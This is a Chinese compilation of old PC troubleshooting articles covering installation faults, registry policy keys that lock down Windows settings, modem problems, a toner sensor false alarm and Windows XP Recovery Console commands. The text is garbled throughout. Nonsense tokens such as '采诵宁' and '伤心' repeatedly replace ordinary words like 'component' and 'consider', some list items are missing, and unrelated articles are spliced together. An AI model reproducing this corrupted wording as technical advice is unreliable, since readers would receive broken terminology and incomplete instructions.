c) 仔细检查报错信息，判断可能造成故障的部位；
d) 观察系统是否有异味，元器件的温度；
e) CPU风扇的转速是否过慢或不稳定；
f) 驱动器工作时是否有不正常的声响。
B. 其它方面检查：
a) 认真对照软件的使用手册，确认机器的软、硬件配置符合该手册的要求；
仔细观察安装介质是否完好。
2) 设备安装
A. 检查设备的连接与外观：
a) 要安装的设备、采诵宁是否连接正确，连接电缆是否完好、接针是否有缺针、断针、或短接的现象；
要安装的设备、采诵宁的制作工艺是否优良；
c) 余类似上述软件安装。
B. 驱动程序介质检查：用于安装设备的驱动程序介质是否完好。
3、 故障判断要点
1) 操作系统安装：
A. 检查CMOS中的设置：
a) 如果需要，请先恢复到出厂设置；
关闭BootEasy功能、关闭防病毒功能，及关闭BIOS防写开关；
c) 特别注意硬盘的参数、CPU的温度等。注意观察自检时显示出来的信息是否与实际的硬件配置相符。
B. 安装介质与目标介质检查：
a) 检查是否有病毒；
检查分区表是否正确、分区是否激活。使用Fdisk /mbr命令来确保主引导记录是正确的（注意使用此命令后，如果机器不能启动，可证明原系统中存在病毒或有错误。硬盘应做初始化操作）；
c) 检查系统中是否有第三方内存驻留程序。
以下过程，建议在软件最小系统下检查（注：在最小系统下，需要添加与安装有关的其它驱动器）。
C. 安装过程检查：
a) 如果在复制文件时，报CAB等文件错，可偿试将原文件复制到另一介质（如硬盘）上再行安装。如果正常通过，则原安装介质有问题，可去检查介质及相应的驱动器是否有故障；若仍然不能复制，应检查相应的磁盘驱动器、数据线、内存等采诵宁；
如果是采用覆盖安装而出现上述问题，建议如果更换安装介质后仍不能排除故障，应先对硬盘进行初始化操作，再重新安装（初始化操作时，最好将硬盘分区彻底清除后进行）。如果仍不能解决，再伤心虑硬件；
c) 安装过程中，在检测硬件时出现错误提示、蓝屏或死机等，一是通过多重新启动几次（应该是关机重启），看能否通过；另一是在软件最小系统下检查是否能通过。如果不能通过，应该依次检查软件最小系统中的内存、磁盘、CPU（包括风扇）、电源等采诵宁；如果能正常安装，则是软件最小系统之外的采诵宁的故障或配置问题，这可通过在安装完成后，逐步添加那些采诵宁，并判断是否有故障或配置不当；
D. 硬件及其它应注意的问题：
a) 如果安装系统时重启或掉电，要求在软件最小系统下进行测试。如果故障消失，在安装好系统以后，将软件最小系统之外的设备逐一接上，检查故障是由哪个采诵宁引起，并用替换法解决；如果故障不能消失，应检查软件最小系统中的电源、主板和内存，甚至磁盘驱动器；
在IDE设备上安装诸如UNIX操作系统时，或要安装多个操作系统时，要注意：一是8.4GB 限制（UNIX的开始部分必须在8.4GB之内）--这一条在SCSI设备上无这一要求；另一是多操作系统间的安装顺序及配合关系；
E. 对于LEOS的安装应注意以下几点：
a) 确保主板BIOS支持LEOS，建议在为用户更换主板后首先就要刷新支持LEOS的BIOS；
如果为用户更换硬盘，也要注意备件硬盘是否正确支持DMA66。否则在安装LEOS时也会出现问题；
c) LEOS最好是在一块全新未被分区的硬盘上进行安装。具体顺序可以参伤心如下方案：新硬盘-〉安装LEOS- >分区（Fdisk）- >安装操作系统（Windows XP）-〉制作一键恢复。如果原硬盘存在分区，可以使用Clear.com程序清楚后再安装LEOS。
2) 应用软件安装：
A. 检查安装应用软件问题时应注意的问题：
a) 应用软件的安装问题，部分可参伤心上述的操作系统安装的检查方法；
在进行安装前，要求先备份注册表，再进行安装；
B. 软件间、软硬件间的冲突检查：
a) 可采用两种软件问题隔离的方法。一是在软件最小系统下，关闭正在运行的应用程序，然后安装需要的应用软件；另一是在原系统下直接关闭正在运行的应用程序，然后安装需要的应用软件。关闭已有的应用的方法是：使用msconfig禁用启动组、autoexec.bat、config.sys、win.ini、system.ini中在启动时调用的程序；
使用任务管理器，检查系统中有无不正常的进程，并给予杀除；
c) 对于基本满足软件技术手册要求但安装不上的情况，看能否通过设置调整来解决。如果不能解决，则视为不兼容；
d) 利用其它机器（最好是不同配置的），检查是否存在软、硬件方面的兼容问题；
e) 检查系统中是否已经安装过该软件，如果已经安装过应先将其卸载后再安装，如果无法正常卸载，可以手动卸载或通过恢复注册表来卸载（对于Windows XP可使用系统还原功能来卸载）；
f) 必要时，可从网络上查阅相关资料，之后再与软件厂商联系，看是否有其他的注意事项。
C. 硬件检查：
在以上的步骤都不奏效时可伤心虑硬件问题，应检查光驱、安装介质、硬盘线等配件。


利用注册表来防止设置的随意更改

《一键清理系统垃圾》

利用注册表来防止设置的随意更改

2002-06-17· ·老范··Yesky

1 2 3 4　下一页

    在很多的应用环境中，并不是每个用户都需要对系统的某些特性进行设置。同时，这样的随意设置将会给系统的管理员带来很大的麻烦。虽然有很多的软件可以实现对电脑系统的设置的保护。这里我来介绍一些关于使用注册表来限制设置项的方法。
    一、开始菜单和桌面的功能限制方法：

    1、限制开始菜单项：

    在注册表：HKEY_USERS\“用户名”\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer下加入如下（新建）DWORD值和它们分别的意义是： “NoRun”=1 该用户的开始菜单中的“运行”命令被禁止；

    “NoSetFolders”=1 该用户的开始菜单中的“设置\文件夹选项”命令被禁止；
    “NoSetTaskbar”=1 该用户的开始菜单中的“设置\任务栏和开始菜单”命令被禁止；
    “NoFind”=1时， 该用户的开始菜单中的“查找”命令被禁止；
    “NoStartMenuSubFolders”=1 该用户“开始”菜单中的子文件夹被隐藏；
    “NoClose”=1时， 该用户的开始菜单中的“关闭系统”命令被禁止；
    “NoStartBanner ”=1，WINDOWS启动时出现在任务栏的箭头标示和“单击此处开始”字样被隐藏；

    2、限制桌面项

    在注册表：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer，在“Explorer”键值下新建下列DWORD值：
    NoDesktop=1 隐藏桌面上的所有图标；
    NoDrivers 隐藏驱动器 （DWORD值的低26个bit从低到高分别对应A-Z驱动器，各bit位=1时为有效）；
    NoNetHood=1 隐藏桌面的“网上邻居”图标；
    NoViewContextMenu=1 隐藏在桌面空白处右击鼠标时弹出的上下文菜单；
    NoTrayContextMenu=1 隐藏任务栏上按右键时弹出的菜单；
    NoEntireNetwork=1 隐藏“网上邻居”中的“整个网络”；
    NoSaveSetting =1 退出前不保存设置；

利用注册表来防止设置的随意更改

2002-06-17· ·老范··Yesky

上一页　1 2 3 4　下一页

    二、限制控制面板

    在注册表：HKEY_USERS\“用户名”\Software\Microsoft\Windows\CurrenVersion\Policies\System，下加入（新建）下列DWORD值，则该用户的相应的控制面板项被禁止：

    “NoDispAppearancePage”=1　　 (禁用“显示器”属性)
    “NoDispBackgroundPage”=1　　（隐藏“显示器”属性中的“背景”页）
    “NoDispCPL”=1　　　　　　　 （隐藏“显示器”属性中的“屏幕保护程序”页）
    “NoDispScrSavPage”=1　　　　（隐藏“显示器”属性中的“外观”页） 　　在注册表：HKEY_USERS\用户名\Software\Microsoft\Windows\CurrentVersion\Policies\Network下加入（新建）下列DWORD值，则该用户相应的控制面板项被限制：
    “NoNetSetup”=1　　　　　（禁用“网络”属性）
    “NoNetSetupIDPage”=1　　（隐藏“网络”属性中的“标识”页）
    “NoNetSetupSecurityPage”=1（隐藏“网络”属性中的“访问控制”页）

    在注册表：HKEY_USERS\用户名\Software\Microsoft\Windows\CurrentVersion\Policies\System下加入（新建）下列DWORD值，则该用户相应的控制面板项被限制：

    “NoSecCPL”=1（禁用“密码”属性）
    “NoPwdPage”=1（隐藏“密码”属性中的“更改密码”页）
    “NoAdminPage”=1（隐藏“远程管理”页）
    “NoProfilePage”=1（隐藏“系统”属性中的“用户配置文件”页）
    “NoDevMgrPage”=1（隐藏“系统”属性中的“设备管理”页）
    “NoConfigPage”=1（隐藏“系统”属性中的“硬件配置文件”页）
    “NoFileSysPage”=1（隐藏“系统”属性“性能”页中的“文件系统”按钮）
    “NoVirtMemPage”=1（隐藏“系统”属性“性能”页中的“虚拟内存”按钮）

T O P 排 行
- Delphi 文件处理及打印绘图

- 智能备份 －众里寻它千百度

- Flash MX 视频导入功能详解

- 如何使用Ghost备份和恢复系统

  利用注册表来防止设置的随意更改

2002-06-17· ·老范··Yesky

上一页　1 2 3 4　下一页

    三、网络和用户设置

    在注册表：HKEY_USERS\“用户名”\Software\Microsoft\Windows\CurrentVersion\Policies
\Explorer下下加入（新建）下列DWORD值，该用户相应的网络和用户设置权限被取消：

    “NoDrives”=1则该用户“我的电脑”中的所有驱动器被隐藏；
    “NoNetHooD”=1，则该用户的“网上邻居”被隐藏；
    “NoEntioeNetwork”=1，则该用户的“网上邻居”中 “整个网络” 被隐藏；
    DWORD值“NoDesktop”=1，则该用户的桌面上所有的程序组被隐藏（即没有桌面）；
    DWORD值“NoSaveSettings”=1，则该用户退出系统时所作的设置不被保存。

    如果有字符串值“NoWorkgroupContents”=1时， 则该用户的“网上邻居”中工作组目录被隐藏；

    2．拨号网络和共享设置：

    在注册表：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Network下建立以下DWORD值，则相应的限制有效：

    “NoDialIn”=1（禁止拨入）
    “NoFileSharing”=1（禁用文件共享）
    “NoWorkgroupContents”=1隐藏“网上邻居”中的工作站显示；
    “NoEntireNetwork”=1 隐藏“网上邻居”中的整个网络显示；
    “NoFileSharingControl”=1 禁止文件共享；
    “NoPrintSharingControl”=1禁止打印机共享；

    3.只运行允许的Windows程序的列表：

    在注册表：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Restrict Run，在该子键下新建串值，串值从“1”开始命名，串值为能运行的应用程序路径名。如:名称 数据

    ① “c:\windows\myprogram1”
    ② “d:\….\myprogram2”

    该限制启动后，只有在RestrictRun列表内的程序能够运行，请保证Systray.exe程序包含在列表中。

利用注册表来防止设置的随意更改

2002-06-17· ·老范··Yesky

上一页　1 2 3 4

    四、口令设置

    在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Network下建立以下DWORD值，则相应的设置有效：

    “HideSharePwds”=1（使用星号（*）隐藏共享口令）
    “DisablePwdCaching”=1（禁用口令缓存；注意！请慎用此项设置， 此时控制面板中的“密码”属性中无法更改密码，登录时该用户使用任何一个密码或不用密码就可以登录。）
    “AlphanumPwds”=1（使Windows口令必须为数字和字母）
    “MinPwdLen”=n（设置Windows口令的最小长度，n大于等于0小于等于8）

    五、禁用注册表编辑器

    HKEY_USERS\“用户名”\Software\Microsoft\Windows\CurrentVersion\Policies\System\下如果有DWORD值“DisableRegstryToo ls”=1，则禁止该用户使用注册表编辑工具。

    六、禁用“MSDOS”方式、禁用单一模式的MSDOS应用程序

    在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\下，新建主键“WinOldApp” ，在该子键下新建DWORD值“Disabled”=1，则该用户的“MSDOS”方式被禁止；“WinOldApp”下如有DWORD值“NoRealMode”=1，则该用户单一模式的MSDOS应用程序被禁用。

    七、自启动的程序

    在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Mic rosoft\Windows\CurrentVersion\Run，其下的字符串值表示通过注册表自启动的程序；

    在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Mic rosoft\Windows\CurrentVersion\RunOnce，其下的字符串值表示只自启动一次的程序；

    在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Mic rosoft\Windows\CurrentVersion\RunServices，其下的字符串值表示通过注册表自启动的服务程序；

    在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Mic rosoft\Windows\CurrentVersion\RunServicesOnce，其下的字符串值表示只启动一次的服务程序。

    由此，我们可以看出上面所有的DWORD值，如果其值为“1”时表示该值有效，其值为“0”时表示该值无效；我们可以通过改变DWORD值或删除该DWORD，来轻松地使相应的限制有效或无效。

上一页


连重装也解决不了的Modem故障

《一键清理系统垃圾》

连重装也解决不了的Modem故障

    笔者单位有一台古董机，大致配置为CeleronⅡ800MHz的CPU、128MB内存，主板芯片为VIA 694X+686B，外接一个DGC 56K Modem。以前使用这台电脑时比较正常，上网速率也很稳定，可是近一个月来上网故障却频频出现，每次开机只能上一次网，断开后再连接就显示“错误630：调制解调器没有正确响应……”的出错提示。打开控制面板里的调制解调器，选诊断竟可以和Modem通讯，但从Windows开始菜单中重新启动又连不上网，必须要关机或重启才能再次上网。

    这个问题比较奇怪，我还是第一次遇上。我试着把Modem接到别的电脑上进行测试，发现拨号和上网都正常。看来病症在本机上，于是我给系统打了补丁，也给Modem换了驱动程序，把Modem端口换了，但丝毫不起作用。

    这样又用了半个来月，问题变得更加严重了：居然怎样设置都连不上网，显示的出错信息和以前一样，通过诊断选项还是可以和Modem通讯。这就怪了，我只有格式化硬盘后重装系统，结果还是不行。再摆弄一番BIOS依然无望，最后我拆掉Modem再接上，居然又可以拨号了，可断开后重拨还是故疾重犯。于是我把故障范围缩小到Modem的数据线和所连接的电话线上。仔细查看这条电话线，发现此线除了连接着这只Modem外竟然还连接着隔壁办公室的一台传真机。故障原因基本明朗化了：Modem一般不能和大功率电子设备接在一条电话线上，而传真机消耗的功率较大，所以直接导致了Modem拨号异常的故障，于是我把传真机重新安装到另一条电话线上，这样，Modem终于可以顺利拨号了。


漫谈Modem速度

《一键清理系统垃圾》

漫谈Modem速度

    上网的朋友有时会遇到这样一个现象，为什么同样的28.8K的Modem，在一台机器上显示上网速率是28800bps，而在另一台机器上却显示115200bps呢，上网的速度真有这么大的差别吗？要想明白这个问题，首先还得从Modem的速度谈起。
    大家都知道，Modem的速度是衡量Modem性能的一个重要指标。一个Modem有两个速度，一个是DTE速度，是指与计算机串口之间的通讯速度。一般用比特率表示（bit per second)，如19200bps、38400bps、57600bps、115200bps等。另一个是DCE速度，也叫电话线上速度，是指两个Modem连线时，两者之间的通讯速度，也用比特率表示，如14.4Kbps、28.8Kbps、33.6Kbps、56Kbps等，平时谈到选购Modem时所标明的也就是这个速度，它才是反映实际上网的速度。
随着ITU-TS（国际通讯联盟）的V.42bis和V.42压缩和纠错协议的推出，对典型的ASCⅡ码文件具有4：1的压缩比。同时V.42bis还具有智能检测方式，自动判断当前所传送的文件是否为压缩文件，如果是压缩文件，V.42bis便不再进行压缩而直接传送，节省了时间。在没有推出压缩和纠错协议之前，Modem的DTE速度与DCE速度是完全一样的。而目前各厂家生产的Modem已普遍具备了上述两组协议，因而也就产生了1DTE速度=4DCE速度的概念。
    现在我们再回过头来看一看这个现象，其实这个现象是由于WIN95显示出Modem的不同速度而造成的，同样28.8K的Modem，在WIN95下一个显示的是电话线上速度（DCE速度）22800bps，另一个显示的串口速度（DTE速度）115200bps。一般在WIN95下拨号上网的用户不能显示电话上速度时，WIN95就显示串口速率。根据本人实际经验，标有28.8K最大速率的Modem就可以以115200bps与计算机串口连接。出现这种情况的原因是因为没有正确地使用厂家提供的Modem驱动程序，而在WIN95下选择的是“标准的调制解调器”的驱动程序，所以就看不到电话线上速度，虽然这时并不影响上网，但是只能反映软件所设置的串口最高速度（DTE速度）。解决这个问题的方法是，在“控制面板”→“调制解调器”→“属性”→“连接”→“高级”→“附加设置”栏中填入Modem的最佳初始化串。不同型号的Modem的初始化串并不完全相同，但是为了使Modem达到最佳通讯效果，最好使用能够发挥其性能的自定义串。一般在Modem的使用手册上可以找到。如果实在不行也可以使用通用初始化串，例如，先键入“ATZ回车”，再键入“AT&FS0=2S7=60V1X4回车”。
    既然知道了Modem有两种速度，而且平时我们所说Modem的速度，如33.6K或56K都是指Modem的最高传输比特率。因此在设置Modem的速度时应综合考虑以下几个方面的因素。
1.Modem所支持的最高数据传输率
在安装WIN95时，串口的缺省速度是9600bps，这显然限制了Modem的传输速度。在传输数据过程中，一般将串口速率设置为超过Modem的最高速率，否则Modem建立连接时会受到此值的限制。例如，在“控制面板”→“系统”→“设备管理”→“端口”→“通讯端口COM2”→“属性”→“端口设置”→“波特率”列表框中选择115200或者更高值。
2.压缩比
不同类型文件的压缩比是不一样的，对于ASCⅡ码文本文件具有最大的压缩比，对于经过压缩软件压缩过的文件基本上不再进行压缩。
3.通讯线路的质量
通过国内电话网进行连接的Modem，容易受到通讯线路和程控交换机的瓶颈效应的制约，相对来说市话比长话的效果要好。当电话通讯线路较好时，如果传输的是未经过压缩的文件，可以按Modem最高传输率×压缩比＝最高速率来设置。如果电话通讯线路不好，则可以根据线路实际支持的线路速度进行设置。14.4K的Modem可以设置成19200bps、28.8K和33.6K的Modem可以设置成38400bps、56K的Modem可以设置成115200bps以上。
4、串口UART芯片的限制
计算机中串口UART芯片所支持的最大通讯速度限制了外置式Modem的通讯速度。到目前为止常见的UART芯片的类型有三种，所能支持的最大DTE速率分别为：8250型号支持19200bps、16450型号支持38400bps、16550型号支持115200或557600bps。由于内置式Modem中自带UART芯片，因此不受计算机串口芯片的限制。
对上网时的速度最好是通过上网下载软件进行测试。利用FTP下载工具如网络吸血鬼，下载网上的压缩文件。对于正常的下载速度应该是连接速度除以9或8（包括8个数据位，1个起始位）。例如，以33600连接时，本地的正常下载速度应在3.4K~3.8K之间，如果大大低于正常值，则Modem的工作速度不正常。
最后需要说明的两点，一是尽管目前许多ISP将它的设备进行了数字化改造，从因特网上上传或下载可以达到56Kbps的速度，但用Modem发送数据也只有33.6Kbps。由于受到电话线路和网络服务商出口带宽的限制，56Kbps的Modem至少在当前还不能充分发挥其应有的优势。二是目前市场上Modem的品牌很多，大致可以分成两大类。一类是质量稳类。这类Modem以传输的质量为根本，传输数据比较可靠，在此基础上进行的连接速度就低不就高，实际上网速度比较快些。另一类是速度快类。这类Modem在连接时尽量提供较高的速度，而且有时以牺牲传输质量为代价，最坏的情况是因为传输过程中错误太多而反复传输或干脆断线，结果反而造成实际上网速度很慢。所以选购Modem不能光看Modem的最高传输速度，还要考虑自己的实际情况。


墨粉虚警现象与处理

《一键清理系统垃圾》

墨粉虚警现象与处理

    一些激光打印机中设有一个墨粉传感器，一旦探测到墨粉盒中的墨粉告罄，打印机会立即亮灯提示用户，若不换上新墨粉盒就不能打印了。

    三年前，笔者添置了一台激光打印机，使用一段时间后，提示墨粉盒中的墨粉已“用完”，笔者立即换上了新墨粉盒。事后晃动换下的旧墨粉盒时，感到其中还有剩余的墨粉，因此没有将它抛弃（编者注：出于环保的要求，废弃粉盒应该交由厂方回收处理）。

    笔者就此问题询问了销售商，当时得到的答复是：提示墨粉已用完的指示灯亮后，墨粉盒中即使有剩余，也只是一些纸屑等，不能再用。

    第二个墨粉盒打印数百页后，打印机又提示墨粉已用完。将墨粉盒取出，晃动后又发现其中还有很多粉末。打开粉盒窗检查后，笔者确认两个墨粉盒中剩余粉末基本上都是墨粉。于是将两个盒中的剩余墨粉合并到其中一个墨粉盒中，再装到打印机上。打印机又能正常打印了。这一事例说明该打印机粉尽提示是虚警，属于错报。

    为搞清错报原因，笔者作了进一步调研。结果发现：错报是墨粉传感器惹的祸。由于该型号激光打印机的墨粉传感器过于灵敏，因此，当墨粉的剩余量还相当多时，就出现了粉尽的错报。这一判断近期从销售商处得到了证实。

    众所周知，墨粉是激光打印机的主要耗材，它的消耗量对于打印成本的影响最大。为了做到粉尽其用，降低打印成本，使用有类似问题的激光打印机的用户，可用棉花等遮蔽物将墨粉传感器遮挡起来，不指望靠它来报警，而是根据打印效果来直接判断，直用到墨粉接近用完为止。


目录和文件操作命令

《一键清理系统垃圾》

目录和文件操作命令

Windows XP 控制台命令详解 - 目录和文件操作命令

编者语：
    Windows XP（包括 Windows 2000）的控制台命令是在系统出现一些意外情况下的一种非常有效的诊断和测试以及恢复系统功能的工具。小编的确一直都想把这方面的命令做个总结，这次辛苦老范给我们整理了这份实用的秘笈。

    Attrib

    更改单个文件或目录的属性。该命令设置或删除指派给文件或目录的只读、系统、存档、隐藏以及压缩属性。

    含有下列参数的 attrib 命令仅当使用故障恢复控制台时才可用。含有不同参数的 attrib
命令可在命令提示符中使用。

    attrib [ +r|-r] [ +s|-s] [ +h|-h] [ +c|-c] [ [ drive:] [ path] filename]

    参数

+r 设置只读属性。
-r 清除只读属性。
+s 设置系统属性。
-s 清除系统属性。
+h 设置隐藏属性。
-h 清除隐藏属性。
+c 设置压缩属性。
-c 清除压缩属性。

    [ [ drive:] [ path] filename]

    指定要处理的目录或文件的位置和名称。可以一次只更改一个文件，也可以更改整个目录。

    注意：可以用一个命令更改一个文件或目录的多个属性。

    Batch

    执行在文本文件中指定的命令。batch 命令仅在使用故障恢复控制台时才可用。故障恢复控制台可以从安装 CD 中启动。

    batch input_file [ output_file]

    参数

    input_file

    指定包含要执行的命令列表的文本文件。Input_file 可以由驱动器号和冒号、目录名、文件名或它们的组合构成。

    output_file

    如果指定，则在命名文件中存储命令输出。如果没有指定，输出将显示在屏幕上。

    范例

    下例将执行批处理文件 C:\Jobs\Find.txt 并将输出存储在文件 C:\Jobs\Results.txt 中：

    batch c:\jobs\find.txt c:\jobs\results.txt

    注意：批处理文件不能包含嵌套的 batch 命令。

    Chdir（Cd）

    显示当前目录的名称，或更改当前的文件夹。

    含有下列参数的 chdir 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 chdir 命令。

    chdir [drive:] [path] [ ..]

    或者

    cd [drive:] [ path] [ ..]

    参数　　无

    如果不带任何参数，chdir 将显示当前驱动器和文件夹的名称。只与驱动器号一起使用（例如 cd C:），chdir 将显示指定驱动器上的当前目录。

    [ drive:] [ path]

    指定要改到的驱动器（如果不是当前驱动器）和目录。

    [ ..]

    指明要改到父文件夹。在 chdir 和两个句点之间插入一个空格。

    注意

Chdir 将空格视作分隔符。用引号将包含空格的目录名扩起来。例如：
cd "driver cache"

Chdir 只适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。
    Copy

    将单个文件复制到其他位置。含有下列参数的 copy 命令仅在使用故障恢复控制台时才可用。

    可在命令提示符下使用带不同参数的 copy 命令。

    copy source [ destination]

    参数

    source

    指定要被复制的文件的位置和名称。Source 可由驱动器号和冒号、目录名、文件名或组合所组成。

    destination

    指定要复制到其中的文件或文件集的位置和名称。Destination 可以由驱动器号和冒号、文件夹名、文件名及组合而组成。

    注意

源可以是可移动媒体、当前 Windows 安装的系统目录中的任何目录、驱动器的根目录、本地安装源或 Cmdcons 目录。
目标可以是除可移动媒体以外的任何与源相同的位置。如果没有指定目标，则默认为当前目录。
Windows 安装 CD 中的压缩文件在复制过程中解压缩。
Copy 不支持通配符。
    Delete（Del）

    删除单个文件。含有下列参数的 delete 或 del 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 delete 或 del 命令。

    delete [ drive:] [ path] filename

    或者

    del [ drive:] [ path] filename

    参数

    [ drive:] [ path] filename指定要删除的文件的位置和名称。

    注意

Delete 只适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。
    Dir

    显示目录中的文件和子目录列表。含有下列参数的 dir 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 dir 命令。

    dir [ drive:] [ path] [ filename]

    参数

    [ drive:] [ path]

    指定要查看列表的驱动器和目录。

    [ filename]

    指定要查看列表的特定文件或一组文件。可以使用多个文件名。文件名可以用空格、逗号或分号隔开。可以在 filename 参数中使用通配符（? 和 *）显示一组文件。

    Dir 还列出磁盘的卷标和序列号，以及所列文件的数目，累计大小和磁盘上剩余的可用空间（以字节计）。对于每个文件和子目录而言，dir 列出文件的扩展名、文件字节数、文件的最后修改日期和时间以及下列文件属性（如果可用）：

缩写 属性
d 目录
h 隐藏文件
s 系统文件
e 加密
r 只读
a 存档文件
c 已压缩
p 重新分析点

    注意：

    Dir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。

    Expand

    从压缩文件中提取文件。通过该命令可从 .cab 文件或压缩文件中提取驱动程序文件。

    含有下列参数的 expand 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 expand 命令。

    expand source [ /F:filespec}] [ destination] [ /d] [ /y]

    参数

    source

    指定要展开的文件。如果源文件只包含一个文件，请使用该选项。source 可由驱动器号和冒号、目录名、文件名或组合所组成。不能使用通配符。

    /f:size

    如果源文件包含多个文件，指定要提取的文件的名称。可以对要提取的文件使用通配符。

    destination

    指定提取文件或每个单独文件的目标目录和（或）文件名。

    /d

    列出 CAB 文件中包含的文件而不展开或提取。

    /y

    在展开或提取文件时不出现覆盖提示。

    范例

    下例将从安装 CD 上的驱动程序 CAB 文件中提取 Msgame.sys 文件并将其复制到 C:\Windows\System\Drivers：

    expand d:\i386\driver.cab\f:msgame.sys c:\windows\system\drivers

    下例将展开压缩文件 Access.cp_：

    expand d:\i386\acces.cp_c:\windows\system32\access.cpl

    下例将列出安装 CD 上的驱动程序 CAB 文件中的所有文件。

    expand /d d:\i386\driver.cab

    要点

驱动程序 CAB 文件包含成千上万的文件，其中包括由 Windows 提供的大部分驱动程序。将所有文件从 CAB 文件展开到硬盘上需要花较长的时间和大量的磁盘空间。建议 仅从该文件中提取需要的文件。
    注意

如果没有指定目标，文件将被复制到当前目录。
不能将软盘驱动器或 CD-ROM 等可移动媒体指定为目标。
    Mkdir（md）

    创建目录或子目录。含有下列参数的 mkdir 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同参数的 mkdir 命令。

    mkdir [ drive:] path

    或者

    md [ drive:] path

    参数

    drive:

    指定要创建新目录的驱动器。

    path

    指定新目录的名称和位置。不能使用通配符。

    注意

Mkdir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。
    Rename（Ren）

    更改单个文件的名称。含有下列参数的 rename 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同参数的 rename 命令。

    rename [ drive:] [ path] filename1 filename2

    或者

    ren [ drive:] [ path] filename1 filename2

    参数

    [ drive:] [ path] filename1

    指定要重新命名的文件的位置和名称。不能使用通配符。

    filename2

    为文件指定新的名称。重新命名文件时不能指定新的驱动器或路径。

    Rmdir（Rd）

    删除目录。含有下列参数的 rmdir 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同参数的 mdir 命令。

    rmdir [ drive:] path

    或者

    rd [ drive:] path

    参数

    [ drive:] path

    指定要删除的目录的位置和名称。不能使用通配符。

    注意

目录必须为空否则命令失败。
Rmdir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。
    Type

    显示文本文件的内容。使用 type 或 more 命令查看文本文件而不修改文件。含有下述参数的 type 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同参数的 type 命令。

    type [ drive:] [ path] filename

    或者

    more [ drive:] [ path] filename

    参数

    [ drive:] path] filename

    指定要查看的文件的位置和名称。

    如果使用 NTFS 驱动器而且文件名包含空格，则必须用引号（"）将文件名引起来。

    More

    显示文本文件的内容。使用 more 或 type 命令查看文本文件而不修改文件。含有下列参数的 more 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同参数的 more 命令。

    more [ drive:] [ path] filename

    或者

    type [ drive:] [ path] filename

    参数

    [ drive:] path] filename

    指定要查看的文件的位置和名称。

    如果使用 NTFS 驱动器，而且文件名包含空格，则必须用引号（"）将文件名引起来。


排除Modem使用中的故障

《一键清理系统垃圾》

排除Modem使用中的故障

    这么多年来，Modem一直是家用网络接入设备的首选。虽然近两年ADSL、ISDN等其他的接入方法不断出现，但是Modem因为价格便宜、接入方便等原因依然占有很大的份额。不过，Modem在使用中的问题也是比较多的，其实绝大多数的故障都可以通过软的方法排除。希望以下的几个例子能够起到抛砖引玉的作用。

    上网总是掉线

    现在网络生活越来越丰富了，特别是各种线上游戏的推出，极大地调动了大众上网的积极性。做为一名网络游戏的玩家，最怕遇到的就是掉线了。在游戏世界中，正在除强扶弱的时候，网络却突然莫名其妙地被切断，等好不容易重新上线，发现自己早已经被坏人杀掉了，真是可悲。

    仔细分析一下，Modem掉线有以下几种原因：

    其一，电话线路有问题。由于数据通信对线路的质量要求要比语音通信高，所以当电话线路有问题就会影响线路质量而容易产生掉线，接电话线的时候一定要注意话线“只可顺接，不可逆接”的原则；

    其二，当在开通双线的电路线路上有电话进来的时候，Modem会因电流突变的冲击而中断，而且如果同一条电话线同时连接了传真机等其它外设，也会对通讯线路产生影响；

    其三，当数据终端机就绪(DTR)信号暂时无效，或是ATR持续无信号时间超过Modem默认值，也会引起掉线；

    其四，Modem本身的质量以及Modem的兼容性问题也可能引起掉线。

    外置 Modem检测不到这个问题虽然比较少见，但是却很麻烦。出现这个问题笔者分析大致有四种情况：其一，主板没有将BIOS中的COM端口打开。解决方法是，重启电脑按住Del键进入BIOS设置，将Integrated Peripherals 菜单中Onboard Serial Port 2选项由“Disabled”改为“Auto”即可。其二，如果排除了BIOS设置问题，那可能是主板的COM端口损坏造成的。解决方法是让主板厂商修理。其三，如果是早期的AT结构主板出现此故障，则可能是由于COM端口与主板之间的连线出现了问题。

    Modem无法进行拨号

    这有三种可能：其一，用户没有在控制面板的网络选项中添加拨号网络适配器,或拨号网络适配器被意外删除。解决的方法是重新安装Modem驱动程序。其二，Modem驱动程序选择不正确，例如安装过两个以上的Modem驱动程序，系统就不能正确识别哪个才是当前正在使用的Modem，从而导致不能正确拨号。解决方法是将多余的驱动程序删除并指定系统当前的驱动程序即可。

小熊在线

电脑工作室　QQ 3149886


排除烦人的Windows Installer故障

《一键清理系统垃圾》

排除烦人的Windows Installer故障

    近日在网上闲逛，发现Vmware出4.0版了。这可是我最喜欢用的虚拟机软件啊！赶快下载，却发现安装不上，系统提示“不能访问Windows Installer服务”。再试一次，还是如此。打开“管理工具”下的“服务”，找到Windows Installer，查看其属性，发现启动类型为“自动”，服务状态为“已停止”，心想可能是什么时候把服务关了吧，单击“启动”按钮，咦？无法启动了！Windows提示“在本地计算机无法启动 Windows Installer 服务。错误 5: 拒绝访问”。自动不行，就用手动！结果还是出现同样的提示！重新启动电脑后故障依
旧，更严重的是，只要是使用MSI文件来安装的软件，现在都无法安装和卸载了！

